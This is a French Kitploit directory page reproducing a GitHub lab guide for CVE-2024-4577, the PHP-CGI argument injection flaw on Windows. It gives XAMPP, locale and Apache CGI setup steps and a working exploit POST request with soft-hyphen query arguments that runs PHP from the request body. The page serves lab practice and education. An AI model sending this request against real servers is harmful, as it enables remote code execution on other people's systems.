Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-4577 — Créer un lab pour CVE-2024-4577 | Kitploit
Outils/GitHubGitHub/alpereny-cs/cve-2024-4577
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubalpereny-cs/cve-2024-4577

CVE-2024-4577

Créer un lab pour CVE-2024-4577

Voir le dépôt
21il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-4577 - Injection d'arguments PHP-CGI (RCE)

CVEDescriptionCVSSv3
CVE-2024-4577Vulnérabilité d'injection d'arguments PHP-CGI9.8

"CVE-2024-4577 est une vulnérabilité critique d'injection d'arguments dans PHP qui peut être exploitée pour exécuter du code à distance (RCE). Selon les chercheurs de DEVCORE, cette faille résulte d'erreurs dans les conversions d'encodage de caractères, affectant la fonctionnalité « Best Fit » sous Windows." -

Télécharger l’outil

Tenable

Créer un laboratoire pour CVE-2024-4577

Télécharger XAMPP

Téléchargez XAMPP (8.1.25 / PHP 8.1.25) Après avoir installé XAMPP, vérifiez la version de PHP. Elle doit être 8.1.25. La version de PHP peut être vérifiée en exécutant la commande "php -v" depuis la ligne de commande. Si cela génère une erreur, PHP doit être ajouté à la variable PATH.

Définir la locale

La locale doit être modifiée. Pour ce faire, suivez : Panneau de configuration > Horloge et région > Région. Définissez le format sur Japonais, Chinois traditionnel ou Chinois simplifié. Cliquez sur Administration > Modifier les paramètres régionaux système et sélectionnez la locale appropriée.

Configuration d'Apache

Si PHP ne s'exécute pas en mode cgi, vous devez effectuer ces réglages.

  • Copiez php.exe ou php-cgi.exe dans le dossier /cgi/bin/.
  • Ajoutez ces lignes dans \xampp\apache\conf\httpd.conf ⬇️
root@kitploit:~
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php

<Directory "C:/xampp/php">
    Options +ExecCGI
    AllowOverride None
    Require all granted
</Directory>
  • Allez dans httpd-xampp.conf et trouvez LoadModule php_module "C:/xampp/php/php8apache2_4.dll". Mettez '#' au début de la ligne.

Démarrer Apache

Enregistrez les modifications et démarrez l'instance Apache.

Exploitation

Si le résultat du code PHP envoyé dans le corps de la requête POST ci-dessous est visible dans la réponse, l'étape d'exploitation est réussie.

root@kitploit:~
POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: /
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
echo "vulnerable";
?>

Avertissement⚠️

Cet environnement de laboratoire est destiné uniquement à des fins éducatives et ne doit pas être utilisé dans des environnements réels. Je ne suis pas responsable des dommages ou pertes qui pourraient survenir suite à une utilisation inappropriée. Les utilisateurs doivent utiliser cet environnement à leurs propres risques.